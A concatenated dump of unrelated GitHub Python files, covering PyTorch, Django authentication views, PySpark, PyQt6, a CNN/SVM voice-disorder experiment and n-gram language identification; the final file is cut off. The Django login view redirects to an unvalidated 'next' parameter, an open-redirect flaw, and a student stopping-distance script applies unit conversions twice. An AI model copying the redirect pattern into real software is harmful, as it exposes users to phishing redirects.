nn.Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n init.kaiming_uniform_(self.weight, mode='fan_out', a=math.sqrt(5))\n if self.bias is not None:\n _, fan_out = nn.init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_out) if fan_out > 0 else 0\n init.uniform_(self.bias, -bound, bound)\n\n def forward(self, x):\n if x.is_sparse:\n backward_linear = torch.sparse.mm(x, self.weight)\n else:\n backward_linear = torch.mm(x, self.weight)\n\n if self.bias is not None:\n return torch.add(input=backward_linear, other=self.bias, alpha=1)\n else:\n return backward_linear\n\n def extra_repr(self) -> str:\n return 'in_features={}, out_features={}, bias={}'.format(\n self.in_features, self.out_features, self.bias is not None\n )","repo_name":"hazdzz/PPNP","sub_path":"model/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3167252091","text":"from accounts.models import Accounts\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.template.loader import render_to_string\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes, force_text\n\nfrom .tokens import generate_token\n\nfrom .forms import RegistrationForm, AccountLoginForm\n\n\n\ndef signup_view(request, *args, **kwargs):\n user = request.user\n if user.is_authenticated: \n return HttpResponse(\"You are already authenticated as \" + str(user.email))\n\n context = {}\n if request.POST:\n form = RegistrationForm(request.POST)\n if form.is_valid():\n \n username = form.cleaned_data.get('username')\n email = form.cleaned_data.get('email').lower()\n raw_password = form.cleaned_data.get('password1')\n first_name = form.cleaned_data.get('first_name')\n last_name = form.cleaned_data.get('last_name')\n form.save()\n #account = authenticate(email=email, password=raw_password)\n #login(request, account)\n #destination = get_redirect_if_exists(request)\n #if destination:\n #\treturn redirect(destination)\n #return redirect('home')\n new_user = Accounts.objects.get(email=email, username=username)\n new_user.first_name = first_name\n new_user.last_name = last_name\n new_user.is_active = False\n\n new_user.save()\n\n current_site = get_current_site(request)\n email_subject = \"Carsify- Confirmation Mail!\"\n message = render_to_string('accounts/email_confirmation.html',{\n 'name': new_user.username,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(new_user.pk)),\n 'token': generate_token.make_token(new_user)\n })\n email = EmailMessage(\n email_subject, \n message,\n settings.EMAIL_HOST_USER,\n [new_user.email],\n )\n email.fail_silently = True\n email.send()\n\n return render(request, 'accounts/signup_verify.html', {'name': new_user.username})\n\n\n else:\n context['registration_form'] = form\n\n else:\n form = RegistrationForm()\n context['registration_form'] = form\n return render(request, 'accounts/signup.html', context)\n\n\n\n\ndef login_view(request, *args, **kwargs):\n context = {}\n\n user = request.user\n if user.is_authenticated: \n return redirect(\"home:home\")\n\n if request.POST:\n form = AccountLoginForm(request.POST)\n if form.is_valid():\n email = request.POST['email']\n password = request.POST['password']\n user = authenticate(email=email, password=password)\n\n if user:\n login(request, user)\n destination = get_redirect_if_exists(request)\n if destination:\n return redirect(destination)\n return redirect(\"home:home\")\n else:\n context['login_form'] = form\n \n else:\n form = AccountLoginForm()\n context['login_form'] = form\n\n return render(request, \"accounts/login.html\", context)\n\n\n\n\n@login_required\ndef logout_view(request):\n\tlogout(request)\n\treturn redirect(\"home:home\")\n\n\n\ndef get_redirect_if_exists(request):\n\tredirect = None\n\tif request.GET:\n\t\tif request.GET.get(\"next\"):\n\t\t\tredirect = str(request.GET.get(\"next\"))\n\treturn redirect\n\n\n\n\ndef verify(request):\n return render(request, 'accounts/signup_verify.html')\n\n\n\n\ndef activate(request, uidb64, token):\n try:\n uid = force_text(urlsafe_base64_decode(uidb64))\n new_user = Accounts.objects.get(pk=uid)\n\n except (TypeError, ValueError, OverflowError, Accounts.DoesNotExist):\n new_user = None\n\n if new_user is not None and generate_token.check_token(new_user, token):\n new_user.is_active = True\n new_user.save() \n return redirect('accounts:login')\n else:\n return HttpResponse(\"Activation Failed!\")","repo_name":"vimal-11/django-custom-authentication","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36092491722","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 11 08:45:24 2022\r\n\r\n@author: vande\r\n\r\n*******\r\nVisulelt sett etter å ha kjørt programmet så er 3-sek regelen\r\nunøyaktig fra ca 103km/t. Skal også vise dette under her. \r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\na = 0.7\r\nb = 0.08\r\n\r\nx_ms = np.linspace(0,1000,1001) # for nøyaktighet\r\nx_kmh = x_ms * 3.6 # meter pr sekund * 3.6 = km/t \r\n\r\nstort_array = np.array([]) # for å samle opp verdier der f1(v) \r\n # er større enn f2(v)\r\n\r\n# print(x_kmh)\r\n\r\n# to formler for stopplengde:\r\n# Stopplengde = reaksjonslengde + bremselengde\r\n# Må lage to funksjoner: f1 og f2\r\n# Kurvene S1 og S2 skal vise hhv f1 og f2\r\n\r\ndef f1(v): #plottes rød\r\n # stopplengde totalt\r\n lengde_totalt = (a*v) + b*(v**2)\r\n return lengde_totalt\r\n\r\ndef f2(v): #plottes grønn\r\n # s = v*t \r\n lengde_totalt = v * 3 # multiplisere fart med sekunder gir meter\r\n return lengde_totalt\r\n\r\n\"\"\"\r\n\r\nNår verdiene fra f1(v) overstiger f2(), så vil ikke 3-sekundersregelen\r\nikke lenger fungere. Jeg velger en for løkke fordi jeg kan ikke vite \r\nom verdiene er direkte like for hver indeks. Jeg ser derfor for når verdiene \r\nfor stopplengde i funksjonen f1() overstiger verdien i f2(). Da har jeg \r\nverdier for hvilken km/t som stopplengden for f1() er større enn f2()\r\n\r\nJeg populerer da alle verdiene til et nytt array og tar derfor og \r\nsjekker første verdien i dette arrayet. Det vil da være aktuell verdi \r\nfor når f1() er større enn f2(). \r\n\r\nVed å sette f1 lik f2, dvs: 3v = av +bv^2, så får man:\r\nv(0,08v - 2,3) = 0 ; Denne løses ved enkel regning uten konstantledd.\r\n\r\nv = 0 eller 0.08v = 2.3\r\n0.08v = 2.3 gir v = 28.75\r\n\r\nvariabelen krysning gir svar 28.8 nå f1>f2. \r\n\r\n\"\"\"\r\n\r\nfor i in x_kmh:\r\n if f1(i+1) > f2(i+1):\r\n stort_array = np.append(stort_array, i)\r\n \r\n else:\r\n pass\r\n \r\nkrysning = stort_array[0]\r\nprint(krysning)\r\n\r\nprint(\"Verdien for når 3-sekunder-regelen\")\r\nprint(\"ikke fungerer er\", round(krysning,2)*3.6, \"km/t\")\r\nprint(\"Se også plott for når grønn og rød kurve har krysning.\")\r\n \r\n\r\n \r\n# Følgende kodesnutt er basert på eksempel fra temp.py av faglærer\r\n# og er modifisert slik at den viser plottet riktig. \r\n\r\nplt.close('all')\r\nplt.figure(1)\r\nplt.plot(x_kmh*3.6, f1(x_kmh), 'r', label='S1: stopplengde formel')\r\nplt.plot(x_kmh*3.6, f2(x_kmh), 'g', label='S2: stopplengde 3-sekundersregel') \r\nplt.axvline(x = (krysning*3.6), color = \"b\", label = \"Krysning S1 og S2\")\r\nplt.legend()\r\nplt.title('Stopplengde reelt og 3-sekunders regelen')\r\nplt.xlabel('Fart m/s')\r\nplt.ylabel('Stopplengde m')\r\n# plt.xlim(0, 150)\r\n# plt.ylim(0, 150)\r\nplt.xlim(0, 150)\r\nplt.ylim(0, 200)\r\nplt.grid()\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"trummar/TBG","sub_path":"python_fil13.py","file_name":"python_fil13.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73661905324","text":"from pyspark.sql.functions import *\nfrom pyspark.sql import *\nfrom pyspark.sql.types import IntegerType\n\nspark = SparkSession.builder.master(\"local\").appName(\"test\").getOrCreate()\nsc = spark.sparkContext\ndata=\"C:\\\\bigdata\\\\datasets\\\\empdata.txt\"\ndf=spark.read.format(\"csv\").option(\"header\",\"true\").option(\"inferSchama\",\"true\").load(data)\nimport re\ncols=[re.sub('[^a-zA-Z]','',x.lower()) for x in df.columns]\nndf=df.toDF(*cols)\n#ndf.show()\nres=ndf.select([regexp_replace(col(x),'\"','').alias(x) for x in ndf.columns])\nres.show(truncate=False)\nres1=res.withColumn('hiredate',to_date(ltrim(col(\"hiredate\")),\"d-MMM-yy\"))\n#res=res1.withColumn(\"hiredate\", to_date(ltrim(col(\"hiredate\")),\"d-MMM-yy\")).withColumn(\"sal\",col(\"sal\").cast(IntegerType()))\n#res1.printSchema()\nres1.show()\n\n","repo_name":"SrikanthGaddam1/pysparkpoc","sub_path":"spark-warehouse/sree123/sparkdata functions1.py","file_name":"sparkdata functions1.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41370785338","text":"import sys\nfrom PyQt6.QtWidgets import QWidget, QStackedWidget, QListWidget, QHBoxLayout, QApplication, QFormLayout, QLineEdit, QRadioButton, QLabel, QCheckBox\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtGui import QPen, QPainter, QImage, QCursor\n\nclass stackedExample(QWidget):\n\n def __init__(self):\n super(stackedExample, self).__init__()\n self.leftlist = QListWidget ()\n self.leftlist.insertItem (0, 'Contact' )\n self.leftlist.insertItem (1, 'Personal' )\n self.leftlist.insertItem (2, 'Educational' )\n\t\t\n self.stack1 = QWidget()\n self.stack2 = QWidget()\n\t\t\n self.stack1UI()\n self.stack2UI()\n\t\t\n self.Stack = QStackedWidget (self)\n self.Stack.addWidget (self.stack1)\n self.Stack.addWidget (self.stack2)\n\t\t\n hbox = QHBoxLayout(self)\n hbox.addWidget(self.Stack)\n hbox.addWidget(self.leftlist)\n\n self.setLayout(hbox)\n self.leftlist.currentRowChanged.connect(self.display)\n self.setGeometry(300, 50, 10,10)\n self.setWindowTitle('StackedWidget demo')\n self.show()\n\t\t\n def stack1UI(self):\n layout = QFormLayout()\n layout.addRow(\"Name\",QLineEdit())\n layout.addRow(\"Address\",QLineEdit())\n #self.setTabText(0,\"Contact Details\")\n self.stack1.setLayout(layout)\n\t\t\n def stack2UI(self):\n layout = QFormLayout()\n sex = QHBoxLayout()\n sex.addWidget(QRadioButton(\"Male\"))\n sex.addWidget(QRadioButton(\"Female\"))\n layout.addRow(QLabel(\"Sex\"),sex)\n layout.addRow(\"Date of Birth\",QLineEdit())\n\t\t\n self.stack2.setLayout(layout)\n\n\n def display(self,i):\n self.Stack.setCurrentIndex(i)\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = stackedExample()\n sys.exit(app.exec())\n","repo_name":"Yrrrrrf/project-canvas","sub_path":"pyQt6/q_staked_widget.py","file_name":"q_staked_widget.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37543999583","text":"# ===============================================\n# Import Packages which needs to tune\nimport matplotlib\nmatplotlib.use(\"Agg\")\n\n\n# ===============================================\n# Import Packages and Functions\nfrom keras import backend as K\nfrom matplotlib import pyplot as plt\nfrom CNN import myCNN\nfrom splitData import splitData\nfrom evaluateSVM import evaluateSVM\nfrom evaluateCNN import evaluateCNN\nfrom keras.models import Model, load_model\nfrom getCombination import getCombination\nfrom loadMelSpectrogram import loadMelSpectrogram\nfrom supportVectorMachine import mySVM\nfrom sklearn.model_selection import KFold\nimport numpy as np\nimport tensorflow as tf\nimport os\nimport math\nimport pickle\n\n\n# ===============================================\n# Stop the terminal printing garbage\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\n\n# ===============================================\n# GPU Setting\ngpu_taken = 0.4\ngpu_options = tf.GPUOptions(per_process_gpu_memory_fraction = gpu_taken)\nsess = tf.Session(config = tf.ConfigProto(gpu_options = gpu_options))\n\n\n# ===============================================\n# Environment\nparent_path = \"/home/hguan/7100-Master-Project/Dataset-\"\nslash = \"/\"\n\n\n# ===============================================\n# Dsp Initialization, num_rows = num_MFCCs (not aggregated)\nfs = 16000\nfft_hop = 128\nfft_length = 512\nmel_length = 128\nsnippet_hop = 100\nsnippet_length = 500\nnum_time_frames = math.ceil(snippet_length / 1000 * fs / fft_hop)\n\n\n# ===============================================\n# Dataset Initialization, dataset = Spanish or KayPentax\nclasses = [\"Normal\", \"Pathol\"]\ninput_type = \"MelSpectrogram\"\ndataset_name = \"KayPentax\"\ndataset_path = parent_path + dataset_name\ndata_file_name = \"MelSpectrogram_\" + str(snippet_length) + \"ms_\" + str(snippet_hop) + \"ms\" + \"_block\" + str(fft_length) + \"_hop\" + str(fft_hop) + \"_mel\" + str(mel_length)\naug_dict_file_name = \"Dictionary_\" + str(snippet_length) + \"ms_\" + str(snippet_hop) + \"ms\" \nunaug_dict_file_name = \"Dictionary_\" + str(snippet_length) + \"ms_\" + str(snippet_hop) + \"ms\" + \"_unaugmented\" \n\n\n# ===============================================\n# Training / Cross-Validation Initialization\nnum_folds = 5 \ntraining_percent = 90\ntrain_on_augmented = True\n\n\n# ===============================================\n# CNN Architecture Initialization\nnum_channel = 4\ninput_shape = (int(mel_length / num_channel), math.ceil(snippet_length / 1000 * fs / fft_hop), num_channel)\nFC_num_neuron_list = [1024, 512, 256, 128, 64, 32, 16, 8, 4]\nCNN_architecture_package = [input_shape, FC_num_neuron_list]\n\n\n# ===============================================\n# CNN Training Initialization, metric = \"acc\" for keras\nmetric = \"acc\"\nbatch_size = 4096\nepoch_limit = 10000000\nadam_beta_1 = 0.9\nadam_beta_2 = 0.999\nlearning_rate = 0.0001\nloss_function = \"mean_squared_error\"\nshuffle_choice = True\ntraining_verbose = 0\nCNN_training_package = [learning_rate, epoch_limit, batch_size, metric, shuffle_choice, loss_function, adam_beta_1, adam_beta_2, training_verbose]\n\n\n# ===============================================\n# CNN Callbacks Initialization\ncallbacks_mode = \"min\"\nsaved_model_name = \"best_model_this_fold.hdf5\"\ncallbacks_monitor = \"val_loss\"\ncallbacks_verbose = 0\nif_only_save_best = True\ncallbacks_patience = 30\nval_loss_plot_name = \"Val_Loss_Plot_\"\ncallbacks_min_delta = 0.0001\nCNN_callbacks_package = [saved_model_name, callbacks_mode, callbacks_monitor, callbacks_patience, callbacks_min_delta, callbacks_verbose, if_only_save_best]\n \n\n# ===============================================\n# SVM Initialization\nc_values = [0.1, 1, 10, 100]\nsvm_verbose = 0\nsvm_tolerance = 0.001\nsvm_max_iteration = 1000\nsvm_training_package = [c_values, svm_verbose, svm_tolerance, svm_max_iteration]\n\n\n\n# ===============================================\n# Result Representation Initialization\nfile_results_CNN = []\nsnippet_results_CNN = []\ntotal_file_con_mat_CNN = np.array([[0,0],[0,0]])\ntotal_snippet_con_mat_CNN = np.array([[0,0],[0,0]])\n\n\n# ===============================================\n# Result Representation Initialization\nfile_results_SVM = []\nsnippet_results_SVM = []\ntotal_file_con_mat_SVM = np.array([[0,0],[0,0]])\ntotal_snippet_con_mat_SVM = np.array([[0,0],[0,0]])\n\n\n# ===============================================\n# Loading Pickle\ntemp_file_1 = open(dataset_path + slash + data_file_name + \".pickle\", \"rb\") \ntemp_file_2 = open(dataset_path + slash + aug_dict_file_name + \".pickle\", \"rb\")\ntemp_file_3 = open(dataset_path + slash + unaug_dict_file_name + \".pickle\", \"rb\")\n\n\n# ===============================================\n# Loading data inside Pickles\naug_dict = pickle.load(temp_file_2)\nunaug_dict = pickle.load(temp_file_3)\nmelSpectrogram_data = pickle.load(temp_file_1)\n\n\n# ===============================================\nif train_on_augmented:\n train_dict = aug_dict\nelse:\n train_dict = unaug_dict\n\n\n# ===============================================\n# Load all combos from this dataset, combo = [Name, Class] example: [\"WADFJS\", \"Pathol\"]\nname_class_combo = np.asarray(getCombination(dataset_path, classes, slash))\n\n\n# ===============================================\nnormal_name_class_combo = [x for x in name_class_combo if (x[1] == \"Normal\")]\npathol_name_class_combo = [x for x in name_class_combo if (x[1] == \"Pathol\")]\n\n\n# ===============================================\nnormal_index_array = np.arange(len(normal_name_class_combo))\npathol_index_array = np.arange(len(normal_name_class_combo), len(name_class_combo))\n\n\n# ===============================================\nkf_spliter = KFold(n_splits = num_folds, shuffle = True)\n\n\n# ===============================================\nnormal_split = kf_spliter.split(normal_index_array)\npathol_split = kf_spliter.split(pathol_index_array)\n\n\n# ===============================================\n# Creat N-folds for normal files\nnormal_split_index = []\nfor training_validate_index, test_index in normal_split:\n normal_split_index.append([normal_index_array[training_validate_index], normal_index_array[test_index]])\n\n\n# ===============================================\n# Creat N-folds for pathol files\npathol_split_index = [] \nfor training_validate_index, test_index in pathol_split:\n pathol_split_index.append([pathol_index_array[training_validate_index], pathol_index_array[test_index]])\n \n\n# ===============================================\n# Start to do k-fold Cross Validation\nfor fold_index in range(num_folds):\n\n\n # ===============================================\n print(\"---> Now Working On Fold \", fold_index + 1, \" ----------------------------\")\n\n\n # ===============================================\n # For each class, get traininging_validation files and test file\n normal_training_validate_combo = name_class_combo[normal_split_index[fold_index][0]].tolist() \n pathol_training_validate_combo = name_class_combo[pathol_split_index[fold_index][0]].tolist() \n normal_test_combo = name_class_combo[normal_split_index[fold_index][1]].tolist() \n pathol_test_combo = name_class_combo[pathol_split_index[fold_index][1]].tolist() \n\n\n # ===============================================\n # For each class, split traininging data and validation data\n [normal_training_combo, normal_validate_combo, _] = splitData(normal_training_validate_combo, training_percent, 100 - training_percent, 0) \n [pathol_training_combo, pathol_validate_combo, _] = splitData(pathol_training_validate_combo, training_percent, 100 - training_percent, 0)\n \n\n # ===============================================\n # Combine traininging set, validation set, test set\n training_combo = normal_training_combo + pathol_training_combo\n validate_combo = normal_validate_combo + pathol_validate_combo\n test_combo = normal_test_combo + pathol_test_combo\n\n\n # ===============================================\n # Load all the snippet\"s melSpectrograms\n # Training set can use either augmented data or unaugmented data\n # Validation set and test set must use unaugmented data\n training_package = loadMelSpectrogram(training_combo, classes, mel_length, num_time_frames, input_type, melSpectrogram_data, train_on_augmented, train_dict) \n validate_package = loadMelSpectrogram(validate_combo, classes, mel_length, num_time_frames, input_type, melSpectrogram_data, False, unaug_dict) \n test_package = loadMelSpectrogram(test_combo, classes, mel_length, num_time_frames, input_type, melSpectrogram_data, False, unaug_dict)\n \n\n # ===============================================\n # When using this method, we need to use label type 3 which is \"Normal\" vs \"Pathol\"\n # Also need type 1 for test data which is [1, 0] vs [0, 1], and type two, which is 0 vs 1\n training_data, training_label_1, training_label_2, training_label_3, training_dist, _ = training_package\n validate_data, _, validate_label_2, validate_label_3, validate_dist, validate_augment_amount = validate_package\n test_data, _, test_label_2, test_label_3, test_dist, test_augment_amount = test_package\n \n\n # ===============================================\n # Show how many files and snippets in each set\n print(training_dist)\n print(validate_dist)\n print(test_dist)\n\n\n # ===============================================\n # Change the one-channel melspectrogram to multiple-channels\n training_data = training_data.reshape(training_data.shape[0], num_channel, int(training_data.shape[1] / num_channel), training_data.shape[2]) \n validate_data = validate_data.reshape(validate_data.shape[0], num_channel, int(validate_data.shape[1] / num_channel), validate_data.shape[2]) \n test_data = test_data.reshape(test_data.shape[0], num_channel, int(test_data.shape[1] / num_channel), test_data.shape[2]) \n \n \n # ===============================================\n # Rearange tensor\"s dimension\n training_data = np.moveaxis(training_data, 1, -1)\n validate_data = np.moveaxis(validate_data, 1, -1)\n test_data = np.moveaxis(test_data, 1, -1)\n\n\n # ===============================================\n # Train CNN\n training_history = myCNN(training_data, training_label_1, training_label_2, \n validate_data, validate_label_2, \n classes,\n CNN_architecture_package,\n CNN_training_package,\n CNN_callbacks_package)\n \n\n # ===============================================\n # Load Trained CNN\n fold_best_CNN = load_model(saved_model_name)\n\n \n # ===============================================\n # save the plot of validation loss\n plt.plot(training_history.history[callbacks_monitor])\n plt.savefig(val_loss_plot_name + str(fold_index + 1) + \".png\")\n plt.clf()\n\n\n # ===============================================\n # First we release the results directly from the CNN \n fold_result_package = evaluateCNN(fold_best_CNN, test_combo, test_data, test_label_3, test_augment_amount, classes)\n\n\n # ===============================================\n # Unpack the evaluation result\n fold_file_acc, fold_file_con_mat, fold_snippet_acc, fold_snippet_con_mat = fold_result_package\n\n \n # ===============================================\n # Print the result for this fold \n print(\"Now we have results directly from the CNN:\")\n print(\"The file macro accuracy for this fold is: \", fold_file_acc)\n print(\"The snippet macro accuracy for this fold is: \", fold_snippet_acc)\n print(\"File confusion matrix for this fold is: \")\n print(fold_file_con_mat)\n print(\"Snippet confusion matrix for this fold is:\")\n print(fold_snippet_con_mat)\n\n\n # ===============================================\n # Update overall results\n file_results_CNN.append(fold_file_acc)\n snippet_results_CNN.append(fold_snippet_acc)\n\n\n # ===============================================\n # Update overall confusion matrix\n total_file_con_mat_CNN = total_file_con_mat_CNN + fold_file_con_mat\n total_snippet_con_mat_CNN = total_snippet_con_mat_CNN + fold_snippet_con_mat\n\n\n\n # ===============================================\n # Start to select the best dimension for this fold\n fold_best_file_acc = 0\n for dimension in FC_num_neuron_list:\n\n\n # ===============================================\n # Form a feature extractor from the trained CNN \n index = FC_num_neuron_list.index(dimension)\n cur_extractor = Model(inputs = fold_best_CNN.inputs, \n outputs = fold_best_CNN.layers[-1 - index].output)\n\n \n # ===============================================\n # Get encoded training data and validate data \n training_data_CNNed = cur_extractor.predict(training_data)\n validate_data_CNNed = cur_extractor.predict(validate_data)\n \n \n # ===============================================\n # Train SVMs, search the best parameters\n cur_SVM = mySVM(training_data_CNNed, training_label_3,\n validate_data_CNNed, validate_label_3,\n svm_training_package, classes)\n \n \n # ===============================================\n # Check how good is this encoding dimension perform on the validation set\n cur_result_package = evaluateSVM(cur_SVM, validate_combo, \n validate_data_CNNed, validate_label_3, \n validate_augment_amount, classes)\n \n\n # ===============================================\n cur_file_acc, _, _, _, = cur_result_package\n \n\n # ===============================================\n # if current result is good enough on the validation set\n # Then we keep current encoder + SVM as our best model combination\n if cur_file_acc > fold_best_file_acc:\n fold_best_SVM = cur_SVM\n fold_best_file_acc = cur_file_acc\n fold_best_dimension = dimension\n fold_best_extractor = cur_extractor\n\n \n # ===============================================\n # Print dimension searching result\n print(\"For this fold, the best encoder's dimension is: \", fold_best_dimension)\n\n \n # ===============================================\n # Prepare \"CNNed\" test set\n test_data_CNNed = fold_best_extractor.predict(test_data)\n\n\n # ===============================================\n # Test our best model combination\n fold_result_package = evaluateSVM(fold_best_SVM, test_combo, \n test_data_CNNed, test_label_3, \n test_augment_amount, classes)\n\n\n # ===============================================\n # Unpack the evaluation result\n fold_file_acc, fold_file_con_mat, fold_snippet_acc, fold_snippet_con_mat = fold_result_package\n \n \n # ===============================================\n # Print the result for this fold\n print(\"After searching the best extractor, we have the following result: \")\n print(\"The file macro accuracy for this fold is: \", fold_file_acc)\n print(\"The snippet macro accuracy for this fold is: \", fold_snippet_acc)\n print(\"File confusion matrix for this fold is:\")\n print(fold_file_con_mat)\n print(\"Snippet confusion matrix for this fold is:\")\n print(fold_snippet_con_mat)\n\n\n # ===============================================\n # Update overall results\n file_results_SVM.append(fold_file_acc)\n snippet_results_SVM.append(fold_snippet_acc)\n\n\n # ===============================================\n # Update overall confusion matrix\n total_file_con_mat_SVM = total_file_con_mat_SVM + fold_file_con_mat\n total_snippet_con_mat_SVM = total_snippet_con_mat_SVM + fold_snippet_con_mat\n\n\n\n # ===============================================\n # Clean almost everything for last fold, otherwise computer might crash\n K.clear_session()\n tf.reset_default_graph()\n os.remove(saved_model_name)\n print(\"Memory Cleared, Saved Model Removed\")\n\n\n# ===============================================\n# Show Final Results after cross-validation\n# Classification Accuracy for each fold (file level)\nprint(\"Now showing the result if we use CNN directly: \")\nprint(\"--------------------------------\")\nprint(\"file results\")\nprint(file_results_CNN)\nprint(sum(file_results_CNN) / len(file_results_CNN))\n\n\n# ===============================================\n# Show Final Results after cross-validation\n# Classification Accuracy for each fold (snippet level)\nprint(\"--------------------------------\")\nprint(\"snippet results\")\nprint(snippet_results_CNN)\nprint(sum(snippet_results_CNN) / len(snippet_results_CNN))\n\n\n# ===============================================\n# Macro Accuracy for the whole experiment (file level)\nprint(\"--------------------------------\")\nprint(\"final file results\")\nprint(total_file_con_mat_CNN)\n\n\n# ===============================================\nfile_overall_acc = 0;\nfor i in range(len(total_file_con_mat_CNN[0])):\n file_overall_acc = file_overall_acc + total_file_con_mat_CNN[i][i] / sum(total_file_con_mat_CNN[i])\nprint(file_overall_acc / len(classes))\n\n\n# ===============================================\n# Macro Accuracy for the whole experiment (snippet level)\nprint(\"--------------------------------\")\nprint(\"final snippet results\")\nprint(total_snippet_con_mat_CNN)\n\n\n# ===============================================\nsnippet_overall_acc = 0;\nfor i in range(len(total_snippet_con_mat_CNN[0])):\n snippet_overall_acc = snippet_overall_acc + total_snippet_con_mat_CNN[i][i] / sum(total_snippet_con_mat_CNN[i])\nprint(snippet_overall_acc / len(classes)) \n\n\n# ===============================================\n# Show Final Results after cross-validation\n# Classification Accuracy for each fold (file level)\nprint(\"Now showing the result if we search CNN's layers: \")\nprint(\"--------------------------------\")\nprint(\"file results\")\nprint(file_results_SVM)\nprint(sum(file_results_SVM) / len(file_results_SVM))\n\n\n# ===============================================\n# Show Final Results after cross-validation\n# Classification Accuracy for each fold (snippet level)\nprint(\"--------------------------------\")\nprint(\"snippet results\")\nprint(snippet_results_SVM)\nprint(sum(snippet_results_SVM) / len(snippet_results_SVM))\n\n\n# ===============================================\n# Macro Accuracy for the whole experiment (file level)\nprint(\"--------------------------------\")\nprint(\"final file results\")\nprint(total_file_con_mat_SVM)\n\n\n# ===============================================\nfile_overall_acc = 0;\nfor i in range(len(total_file_con_mat_SVM[0])):\n file_overall_acc = file_overall_acc + total_file_con_mat_SVM[i][i] / sum(total_file_con_mat_SVM[i])\nprint(file_overall_acc / len(classes))\n\n\n# ===============================================\n# Macro Accuracy for the whole experiment (snippet level)\nprint(\"--------------------------------\")\nprint(\"final snippet results\")\nprint(total_snippet_con_mat_SVM)\n\n\n# ===============================================\nsnippet_overall_acc = 0;\nfor i in range(len(total_snippet_con_mat_SVM[0])):\n snippet_overall_acc = snippet_overall_acc + total_snippet_con_mat_SVM[i][i] / sum(total_snippet_con_mat_SVM[i])\nprint(snippet_overall_acc / len(classes)) ","repo_name":"guwalgiya/Voice-Disorder-Diagnosis","sub_path":"CNN_Approach/Main_one_dataset_experiment.py","file_name":"Main_one_dataset_experiment.py","file_ext":"py","file_size_in_byte":20249,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"36211564567","text":"import pickle\nfrom ngrams import Ngrams, get_bigram_file, get_unigram_file\n\nenglish_training = \"data/LangId.train.English\"\nfrench_training = \"data/LangId.train.French\"\nitalian_training = \"data/LangId.train.Italian\"\n\ntraining_data = [english_training, french_training, italian_training]\n\ntest_data = \"data/LangId.test\"\n\n\ndef main() -> None:\n \"\"\"\n creates training files for different languages or evaluates training data accuracy\n \"\"\"\n\n print(f\"\\n{' Choose one of the option ':=^50}\")\n print(\"1. Create Model\")\n print(\"2. Evaluate Model\")\n\n val = int(input(\"Enter a number: \"))\n print()\n\n if (val == 1):\n create_training_data()\n elif (val == 2):\n evaluate()\n else:\n print(\"Please provide correct input\")\n\n\ndef create_training_data() -> None:\n ng = Ngrams()\n\n for f in training_data:\n lang = f.split(\".\")[-1].lower()\n print(\"Creating training data for \" + lang)\n\n unigram_dict, bigram_dict = ng.create_ngrams(f)\n\n with open(get_unigram_file(lang), 'wb') as f:\n pickle.dump(unigram_dict, f)\n\n with open(get_bigram_file(lang), 'wb') as f:\n pickle.dump(bigram_dict, f)\n\n print(\"Training data created for \" + lang)\n\n\ndef evaluate() -> None:\n ng = Ngrams()\n ng.evaluate(test_data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jigneshsatam/NLP","sub_path":"Ngrams/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22485877140","text":"from builtins import super, slice\n\n# from Tools.scripts.patchcheck import status\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Max\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views import generic\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render, redirect\n\nfrom .form import DokumenForm, EditForm\nfrom django.urls import reverse_lazy\nfrom .models import Dokumen, Fungsi, Klasifikasi, JenisDokumen, TujuanDokumen\nfrom django_select2.forms import Select2MultipleWidget\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom accounts.models import ProfileUser\n\n\n# Create your views here.\n@method_decorator(login_required, name='dispatch')\nclass dashboard(generic.TemplateView):\n\ttemplate_name = 'dokumen/dashboard.html'\n\t\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(dashboard, self).get_context_data()\n\t\tif self.request.user.is_admin:\n\t\t\tcontext['data_surat_masuk'] = Dokumen.objects.exclude(status=3)\n\t\t\tcontext['data_surat_keluar'] = Dokumen.objects.exclude(status=3)\n\t\telif self.request.user.is_staff:\n\t\t\tDokumen.objects.exclude(status=3).filter(fungsi=38).values('tujuandokumen__status')\n\t\t\tcontext['data_surat_keluar'] = 